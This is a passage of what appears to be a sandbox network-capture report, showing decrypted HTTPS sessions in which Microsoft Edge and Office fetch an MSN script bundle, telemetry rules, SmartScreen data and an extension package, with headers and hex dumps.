                                                                                                                                                                                                                                                      116192.168.2.1049886104.70.121.414432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC628OUTGET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1
                                                                                                                                                                                                                                                      Host: assets2.msn.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                                                      Content-MD5: 2o3TH2IeNXyf9OP87xu6FA==
                                                                                                                                                                                                                                                      Last-Modified: Fri, 15 Nov 2024 22:31:11 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DD05C53565F83D
                                                                                                                                                                                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      x-ms-request-id: 64e866d1-101e-0037-3246-3988b3000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:46 GMT
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Connection: Transfer-Encoding
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      Akamai-Request-BC: [a=104.70.121.22,b=396828550,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                      Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                      Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                      Akamai-Server-IP: 104.70.121.22
                                                                                                                                                                                                                                                      Akamai-Request-ID: 17a71f86
                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                      Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                      Akamai-GRN: 0.16794668.1733002726.17a71f86
                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC15145INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 37 65 32 37 63 63 61 36 30 32 37 62 38 64 36 36 39 37 63 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31
                                                                                                                                                                                                                                                      Data Ascii: 00006000/*! For license information please see vendors.7e27cca6027b8d6697cb.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC9443INData Raw: 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28
                                                                                                                                                                                                                                                      Data Ascii: ion(t,e){var n=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+e)+"})|(\\d{2}|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice(
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 75 78 2f 22 29 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 74 5b 6e 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 28 72 29 29 7b 76 61 72 20 69 3d 74 28 72 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 69 7d 72 65 74 75 72 6e 7b 7d 7d 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 6e 7d 2c 66 3d 22 52 4f 4f 54 22 2c 6c 3d 22 4e 41 4d 45 53 50 41 43 45 5f 52 4f 4f 54 22 2c 76 3d 22 43 48 49 4c 44 22 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                      Data Ascii: 00006000ux/")},a=function(t,e){return Object.keys(t).forEach((function(n){return e[n]=t[n]}))},s=function(t,e){var n=function n(r){if(e(r)){var i=t(r);return a(t,n),i}return{}};return a(t,n),n},f="ROOT",l="NAMESPACE_ROOT",v="CHILD",d=function(t){return
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC8204INData Raw: 65 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 38 7c 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 32 7c 28 6e 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 3c 3c 36 7c 28 72 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 2c 69 2b 3d 36 34 3d 3d 3d 6e 3f 64 28 65 3e 3e 31 36 26 32 35 35 29 3a 36 34 3d 3d 3d 72 3f 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 29 3a 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 29 3b 72 65 74 75 72 6e 20 69 7d 2c 4e 3d 6f 3f 74 3d 3e 61 74 6f 62 28 67 28 74 29 29 3a 63 3f 74 3d 3e 42 75 66 66 65 72 2e 66 72 6f 6d 28 74 2c 22 62 61 73 65 36 34 22 29 2e 74 6f 53 74 72 69 6e 67 28 22 62 69 6e 61 72 79 22 29 3a 4c 2c 44 3d 63 3f 74 3d 3e 70
                                                                                                                                                                                                                                                      Data Ascii: e=l[t.charAt(o++)]<<18|l[t.charAt(o++)]<<12|(n=l[t.charAt(o++)])<<6|(r=l[t.charAt(o++)]),i+=64===n?d(e>>16&255):64===r?d(e>>16&255,e>>8&255):d(e>>16&255,e>>8&255,255&e);return i},N=o?t=>atob(g(t)):c?t=>Buffer.from(t,"base64").toString("binary"):L,D=c?t=>p
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC2479INData Raw: 30 30 30 30 30 39 41 33 0d 0a 72 63 65 2c 45 2e 65 78 65 63 28 74 29 29 3b 72 65 74 75 72 6e 20 65 2e 6c 61 73 74 49 6e 64 65 78 3d 74 2e 6c 61 73 74 49 6e 64 65 78 2c 65 7d 2c 78 3d 6e 28 35 36 31 33 37 29 2c 5f 3d 78 2e 5a 3f 78 2e 5a 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 53 3d 5f 3f 5f 2e 76 61 6c 75 65 4f 66 3a 76 6f 69 64 20 30 3b 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 3f 4f 62 6a 65 63 74 28 53 2e 63 61 6c 6c 28 74 29 29 3a 7b 7d 7d 2c 4c 3d 6e 28 39 37 35 35 38 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d
                                                                                                                                                                                                                                                      Data Ascii: 000009A3rce,E.exec(t));return e.lastIndex=t.lastIndex,e},x=n(56137),_=x.Z?x.Z.prototype:void 0,S=_?_.valueOf:void 0;var T=function(t){return S?Object(S.call(t)):{}},L=n(97558);var N=function(t,e,n){var r=t.constructor;switch(e){case"[object ArrayBuffer]
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 6e 28 37 31 31 35 35 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 66 3d 2d 31 2c 6c 3d 69 2e 5a 2c 76 3d 21 30 2c 64 3d 74 2e 6c 65 6e 67 74 68 2c 70 3d 5b 5d 2c 68 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 70 3b 6e 26 26 28 65 3d 28 30 2c 75 2e 5a 29 28 65 2c 28 30 2c 63 2e 5a 29 28 6e 29 29 29 2c 73 3f 28 6c 3d 6f 2e 5a 2c 76 3d 21 31 29 3a 65 2e 6c 65 6e 67 74 68 3e 3d 32 30 30 26 26 28 6c 3d 61 2e 5a 2c 76 3d 21 31 2c 65 3d 6e 65 77 20 72 2e 5a 28 65 29 29 3b 74 3a 66 6f 72 28 3b 2b 2b 66 3c 64 3b 29 7b 76 61 72 20 67 3d 74 5b 66 5d 2c 5a 3d 6e 75 6c 6c 3d 3d 6e 3f 67 3a 6e 28 67 29 3b 69 66 28 67 3d 73 7c 7c 30 21 3d 3d 67 3f 67 3a 30 2c 76 26 26 5a 3d
                                                                                                                                                                                                                                                      Data Ascii: 00004000=n(71155);e.Z=function(t,e,n,s){var f=-1,l=i.Z,v=!0,d=t.length,p=[],h=e.length;if(!d)return p;n&&(e=(0,u.Z)(e,(0,c.Z)(n))),s?(l=o.Z,v=!1):e.length>=200&&(l=a.Z,v=!1,e=new r.Z(e));t:for(;++f<d;){var g=t[f],Z=null==n?g:n(g);if(g=s||0!==g?g:0,v&&Z=
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC12INData Raw: 6e 3a 64 65 6c 65 74 65 20 74 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: n:delete t
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 5b 63 5d 29 2c 69 7d 7d 2c 38 37 33 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 30 33 32 33 29 2c 69 3d 6e 28 33 36 31 32 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 75 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 63 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 28 74 3d 4f 62 6a 65 63 74 28 74 29 2c 28 30 2c 72 2e 5a 29 28 75 28 74 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 29 29 29 7d 3a 69 2e 5a 3b 65 2e 5a 3d
                                                                                                                                                                                                                                                      Data Ascii: 00004000[c]),i}},87339:function(t,e,n){"use strict";var r=n(80323),i=n(3612),o=Object.prototype.propertyIsEnumerable,u=Object.getOwnPropertySymbols,c=u?function(t){return null==t?[]:(t=Object(t),(0,r.Z)(u(t),(function(e){return o.call(t,e)})))}:i.Z;e.Z=
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC12INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: ==typeof t
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC15599INData Raw: 30 30 30 30 33 43 45 33 0d 0a 7d 7d 2c 34 34 31 39 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 35 31 30 29 2c 69 3d 6e 28 31 32 35 34 35 29 2c 6f 3d 6e 28 32 35 31 39 37 29 2c 75 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 63 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 61 3d 75 2e 74 6f 53 74 72 69 6e 67 2c 73 3d 63 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 28 30 2c 6f 2e 5a 29 28 74 29 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 28 30 2c 72 2e 5a 29 28 74 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 28 30 2c 69
                                                                                                                                                                                                                                                      Data Ascii: 00003CE3}},44199:function(t,e,n){"use strict";var r=n(48510),i=n(12545),o=n(25197),u=Function.prototype,c=Object.prototype,a=u.toString,s=c.hasOwnProperty,f=a.call(Object);e.Z=function(t){if(!(0,o.Z)(t)||"[object Object]"!=(0,r.Z)(t))return!1;var e=(0,i


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      117192.168.2.104988513.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:46 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 501
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                      x-ms-request-id: 77084b97-401e-0015-43af-420e8d000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213846Z-174f7845968vqt9xhC1EWRgten000000120g00000000bwgx
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      118192.168.2.1049892104.40.82.1824432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC723OUTPOST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                                                      Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 746
                                                                                                                                                                                                                                                      Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                      Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoienZjenBtZkZWTnhFaWEvNHRJZWtkUT09IiwgImhhc2giOiJzazFSbGh2eTM0ST0ifQ==
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                      Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Content-Length: 57
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Server: Kestrel
                                                                                                                                                                                                                                                      ETag: "638343870221005468"
                                                                                                                                                                                                                                                      Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                                                      Data Ascii: 9murmur3,MhZ8\<&LiH[?m


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      119192.168.2.1049890152.195.19.974432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC616OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733607521&P2=404&P3=2&P4=PMAz2jVPGb8vylg6tZdShGhhfmpj18R3Ev3wDgE0RCiMRNqPAjLyreqztll31eD0%2blpHBeJcTGUeWI%2fll8QPtg%3d%3d HTTP/1.1
                                                                                                                                                                                                                                                      Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      MS-CV: EhSDf3v4MOhFxwOdUaBNFt
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      Age: 12929258
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=17280000
                                                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                                                                      Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                                                                      MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
                                                                                                                                                                                                                                                      MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
                                                                                                                                                                                                                                                      MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
                                                                                                                                                                                                                                                      Server: ECAcc (nyd/D11E)
                                                                                                                                                                                                                                                      X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                      X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                                                                                      X-CCC: US
                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                      X-Powered-By: ARR/3.0
                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                      Content-Length: 11185
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                                                                      Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      120192.168.2.104988813.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
